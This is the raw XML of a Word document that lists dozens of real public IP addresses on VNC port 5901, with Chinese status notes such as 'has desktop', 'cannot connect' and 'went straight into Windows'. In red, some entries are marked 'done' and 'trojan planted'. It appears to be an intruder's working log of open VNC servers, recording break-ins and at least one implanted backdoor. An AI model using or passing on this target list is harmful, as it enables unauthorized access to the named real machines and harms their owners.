    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">218.87.196.5:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>windows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>正在玩游戏</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">218.201.201.62:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>同下</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">218.202.3.70:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>同下</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">218.202.3.72:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>同下</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">218.202.131.132:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>同下</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">218.202.131.139:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>同下</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">218.202.131.133:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>同下</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">218.202.131.146:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>同下</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">218.203.108.26:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>同下</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">218.203.211.242:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>同下</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">218.203.108.132:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>同下</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">218.204.249.97:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>同下</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">218.204.74.58:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有界面</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">218.204.149.110:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有界面</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">218.205.64.69:5901 </w:t>
      </w:r>
      <w:r w:rsidRPr="00B0001A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">centos </w:t>
      </w:r>
      <w:r w:rsidRPr="00B0001A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>已搞定</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>已上马</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">218.203.223.22:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>连接错误</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> error message</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>218.206.176.103:5901</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>同下</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>218.206.176.105:5901</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>同下</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>218.206.165.68:5901</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>同下</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>218.206.165.65:5901</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>同下</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>218.206.165.218:5901</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>同下</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>218.206.165.233:5901</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>同下</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="6"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>218.206.165.67:5901</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>同下</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>218.206.165.219:5901</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>同下</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>218.206.165.221:5901</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>同下</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>218.206.165.225:5901</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>同下</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">218.206.234.123:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>windows server</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>218.206.214.234:5901</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>同下</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>218.206.219.162:5901</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>同下</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>218.207.217.154:5901</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>同下</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">221.13.79.84:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>同下</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">221.13.129.161:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有界面</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">221.13.203.144:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>无法连接</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">221.130.28.30:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>同下</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">221.130.120.166:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>同下</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">221.130.120.162:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>同下</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">221.131.129.210:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>同下</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">221.131.129.200:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>同下</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">221.176.138.29:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>同下</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">221.176.138.35:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>同下</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">221.176.193.102:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>同下</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">221.179.10.198:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有界面</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">221.131.241.180:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有界面</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">221.131.241.179:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有界面</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">221.180.148.12:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有界面</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">221.131.136.131:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有界面</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">221.199.12.252:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有界面</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>221.199.9.172:5901</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>无法连接</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>223.68.170.181:5901</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>无法连接</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>223.68.170.185:5901</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>无法连接</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>223.68.170.137:5901</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有界面</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">223.82.245.150:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>无法连接</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>223.82.245.151:5901</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>无法连接</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">223.82.248.194:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>同下</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">223.100.98.88:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>同下</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">223.100.98.44:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有界面</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">61.152.175.78:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>无法连接</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">78.41.94.121:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>同下</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">202.79.202.185:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有界面</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">221.12.58.70:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>suse</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>界面</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">210.76.97.138:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE7BD6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>redhat</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE7BD6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>系统</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>已搞定</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">221.12.58.70:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>同下</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">221.12.58.70:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>同下</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">202.79.202.174:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>同下</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>202.79.202.184:5901</w:t>
      </w:r>
      <w:r w:rsidRPr="006F2D72">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有界面</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">222.247.216.227:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>直接进入了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>windows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>界面</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">82.154.94.219:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>同下</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">82.154.94.219:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>同下</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>218.62.99.79:5901</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>连接不上</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b w:val="0"/>
          <w:noProof/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2676525" cy="1314450"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="206" name="图片 206" descr="说明: C:\Users\Administrator\AppData\Roaming\Tencent\Users\1415532825\QQ\WinTemp\RichOle\P9SR4%F_2X)AQ)~8`$Z7G$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descr="说明: C:\Users\Administrator\AppData\Roaming\Tencent\Users\1415532825\QQ\WinTemp\RichOle\P9SR4%F_2X)AQ)~8`$Z7G$X.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76525" cy="1314450"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">202.79.202.172:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>同下</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">202.79.202.187:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>同下</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">202.79.202.170:5901 </w:t>
      </w:r>
      <w:r w:rsidRPr="006F2D72">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有界面</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRPr="00881FF3" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b w:val="0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">218.62.99.79:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>连接不上</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b w:val="0"/>
          <w:noProof/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2676525" cy="1314450"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="205" name="图片 205" descr="说明: C:\Users\Administrator\AppData\Roaming\Tencent\Users\1415532825\QQ\WinTemp\RichOle\P9SR4%F_2X)AQ)~8`$Z7G$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descr="说明: C:\Users\Administrator\AppData\Roaming\Tencent\Users\1415532825\QQ\WinTemp\RichOle\P9SR4%F_2X)AQ)~8`$Z7G$X.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76525" cy="1314450"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRPr="00881FF3" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>66.201.41.34:5901</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
